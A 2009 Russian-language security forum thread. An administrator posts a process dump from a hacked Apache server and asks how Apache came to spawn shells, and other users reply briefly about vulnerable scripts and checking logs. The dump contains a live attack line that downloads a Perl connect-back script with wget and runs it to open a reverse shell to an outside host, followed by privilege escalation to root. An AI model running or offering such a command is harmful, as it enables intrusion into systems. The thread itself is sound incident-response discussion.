The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Apache got hacked. Need help"
Вариант для распечатки  
Пред. тема | След. тема 
Форумы Информационная безопасность (Public)
Изначальное сообщение [ Отслеживать ]

"Apache got hacked. Need help"  +/
Сообщение от James email(??) on 07-Сен-09, 13:02 
Vot chast dumpa commadi: ps -AH x

root      8769  0.0  0.3 201012 11508 ?        Ss   Jul22  12:18   /usr/sbin/apache2 -k start
www-data 12996  0.0  0.2 201148  7504 ?        S    Sep03   0:00     /usr/sbin/apache2 -k start
www-data 13294  0.0  0.0   3944   564 ?        S    Sep03   0:00       sh -c cd /dev/shm;wget sip.geostarcom.com/phpmyadmin/cb.txt;perl cb.txt thor.weru.ksu.edu 8080
www-data 13296  0.0  0.0  25404  2740 ?        S    Sep03   0:00         perl cb.txt thor.weru.ksu.edu 8080
www-data 13297  0.0  0.0   3944   572 ?        S    Sep03   0:00           sh -c echo "`uname -a`";echo "`id`";/bin/sh
www-data 13300  0.0  0.0   3944   580 ?        S    Sep03   0:00             /bin/sh
www-data 13700  0.0  0.0   3944   564 ?        S    Sep03   0:00               sh
www-data 13703  0.0  0.0   3944   560 ?        S    Sep03   0:00                 sh
www-data 14061  0.0  0.0   3944   572 ?        S    Sep03   0:00                   sh
www-data 14153  0.0  0.0   3944   596 ?        S    Sep03   0:00                     sh
www-data 14189  0.0  0.0   3944   572 ?        S    Sep03   0:00                       sh
www-data 15627  0.0  0.0   3944   564 ?        S    Sep03   0:00                         sh
www-data 15640  0.0  0.0   3944   564 ?        S    Sep03   0:00                           sh
root     15645  0.0  0.0   3944   564 ?        S    Sep03   0:00                             sh
root     15648  0.0  0.0  31260  1164 ?        S    Sep03   0:00                               su root
root     15649  0.0  0.0  10168  1328 ?        S    Sep03   0:00                                 bash
root     15805 13.2  0.1  37704  5532 ?        R    Sep03 669:21                                   adduser
root     15808  0.0  0.0      0     0 ?        Z    Sep03   0:00                                     [sh] <defunct>
www-data 18464  0.0  0.2 201012  6216 ?        S    01:25   0:00     /usr/sbin/apache2 -k start
www-data  9357  0.0  0.2 201152  7388 ?        S    01:26   0:00     /usr/sbin/apache2 -k start
www-data 23248  0.0  0.2 201152  7388 ?        S    01:27   0:00     /usr/sbin/apache2 -k start
www-data 24479  0.0  0.2 201144  7392 ?        S    01:27   0:00     /usr/sbin/apache2 -k start
www-data  5511  0.0  0.2 203368  8844 ?        S    01:27   0:00     /usr/sbin/apache2 -k start
www-data 24802  0.0  0.2 201012  6268 ?        S    01:28   0:00     /usr/sbin/apache2 -k start
www-data 22050  0.0  0.2 201152  7440 ?        S    01:30   0:00     /usr/sbin/apache2 -k start
www-data 22356  0.0  0.2 201152  7376 ?        S    01:30   0:00     /usr/sbin/apache2 -k start
www-data 13247  0.0  0.2 201144  7400 ?        S    01:31   0:00     /usr/sbin/apache2 -k start
www-data 13248  0.0  0.2 201012  6220 ?        S    01:31   0:00     /usr/sbin/apache2 -k start
www-data 13559  0.0  0.2 203224  8808 ?        S    01:31   0:00     /usr/sbin/apache2 -k start
www-data 13561  0.0  0.2 201012  6216 ?        S    01:31   0:00     /usr/sbin/apache2 -k start
www-data 13562  0.0  0.2 201144  7380 ?        S    01:31   0:00     /usr/sbin/apache2 -k start
www-data 27328  0.0  0.2 201012  6252 ?        S    01:32   0:00     /usr/sbin/apache2 -k start
www-data 27635  0.0  0.2 201152  7364 ?        S    01:32   0:00     /usr/sbin/apache2 -k start

Obratite vnimanie na videlenie stroki. Process 8769 prosto zapuskaet neskolko apache2 processov takih kak (12996, 18464, 9357, 23248 etc.). Apache v prefork kstati, vot chast configa:

<IfModule mpm_prefork_module>
    StartServers          5
    MinSpareServers       5
    MaxSpareServers      10
    MaxClients          150
    MaxRequestsPerChild   0
</IfModule>

Vopros: kakim obrazom process 12996 forkaet process 13294. Kak apacha mojet zapuskat processi v dannom sluchae kommandu sh ....

Budu blagodaren za lubuu pomosh.


Thank you.

Высказать мнение | Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Apache got hacked. Need help"  +/
Сообщение от Michael (??) on 07-Сен-09, 13:26 

>Vopros: kakim obrazom process 12996 forkaet process 13294. Kak apacha mojet zapuskat
>processi v dannom sluchae kommandu sh ....

скрипты дырявые на хосте

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

2. "Apache got hacked. Need help"  +/
Сообщение от James email(??) on 07-Сен-09, 13:40 
>
>>Vopros: kakim obrazom process 12996 forkaet process 13294. Kak apacha mojet zapuskat
>>processi v dannom sluchae kommandu sh ....
>
>скрипты дырявые на хосте

Pryamo skajem ne ochen ischerpivaushiy otvet, no vse ravno spasibo.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

3. "Apache got hacked. Need help"  +/
Сообщение от kopenes (ok) on 01-Окт-09, 12:58 
>>
>>>Vopros: kakim obrazom process 12996 forkaet process 13294. Kak apacha mojet zapuskat
>>>processi v dannom sluchae kommandu sh ....
>>
>>скрипты дырявые на хосте
>
>Pryamo skajem ne ochen ischerpivaushiy otvet, no vse ravno spasibo.

Проверить у всех права, новые группы, юзеров. Посмотреть логи на изменения.

-----
http://www.web-it.ru

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру